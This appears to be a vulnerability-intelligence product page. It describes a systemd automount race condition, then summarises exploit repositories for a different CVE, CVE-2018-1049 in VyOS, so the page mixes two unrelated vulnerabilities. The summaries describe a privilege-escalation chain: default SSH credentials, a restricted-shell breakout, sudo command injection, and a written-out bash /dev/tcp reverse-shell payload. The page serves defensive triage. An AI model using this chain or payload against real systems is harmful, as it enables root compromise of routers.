A race condition in systemd before version 234 exists between .mount and .automount units. Under affected conditions, automount requests originating from the kernel may not be serviced correctly by systemd. This can leave the kernel holding the mountpoint while processes attempting to access that mount block indefinitely. The flaw is a synchronization issue in mount and automount handling rather than a memory corruption bug, and it can cause affected systems to hang on access to the impacted mount until the mount points are unmounted.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos.
Repository contains a single Python exploit script (vyos_exp.py) plus a short README. The script is a custom reimplementation of the Metasploit exploit for CVE-2018-1049 against VyOS/Vyatta. Core behavior: - Connects to a target over SSH (Paramiko) on TCP/22 using hardcoded credentials (USERNAME='vyos', PASSWORD='Pa$$w0rd'). - Performs a basic target check by reading the initial interactive shell banner/prompt and looking for the string 'vyos'. - Attempts to break out of a restricted VyOS shell prompt ('> ') by sending: telnet ';/bin/sh'. If it sees a normal '$ ' prompt, it sends /bin/sh. - Executes a sudo command that abuses command injection in /opt/vyatta/bin/sudo-users/vyatta-show-lldp.pl (via the -i argument) to run an attacker-supplied payload as root. Payload: - Builds a bash reverse shell command (bash -i >& /dev/tcp/LHOST/LPORT 0>&1), base64-encodes it, then injects it so the target decodes it (base64 -d) and executes it with /bin/sh. Overall purpose: - Remote-to-local privilege escalation chain: requires valid SSH credentials, then leverages the vulnerable sudo-permitted Vyatta Perl script to obtain a root reverse shell back to the attacker listener.
This repository contains a Python exploit script (vyos_exp.py) targeting CVE-2018-1049, a privilege escalation vulnerability in VyOS (Vyatta) systems. The exploit requires valid SSH credentials to connect to the target system (default: vyos/Pa$$w0rd) and leverages a command injection flaw in the sudo-permitted Perl script '/opt/vyatta/bin/sudo-users/vyatta-show-lldp.pl'. Upon successful exploitation, the script injects a base64-encoded bash reverse shell payload, granting the attacker a root shell on the target system via a reverse TCP connection to the attacker's specified host and port. The repository consists of two files: a README.md describing the exploit and the main exploit script vyos_exp.py. The exploit is operational, providing a working payload and requiring the attacker to set up a listener for the reverse shell. The attack vector is network-based, as the exploit is launched remotely over SSH, but the privilege escalation occurs via local command injection on the target.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
3 sources tracked across advisories and community write-ups. News coverage will land here when it surfaces.
No news coverage yet. Advisories and community discussion only.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.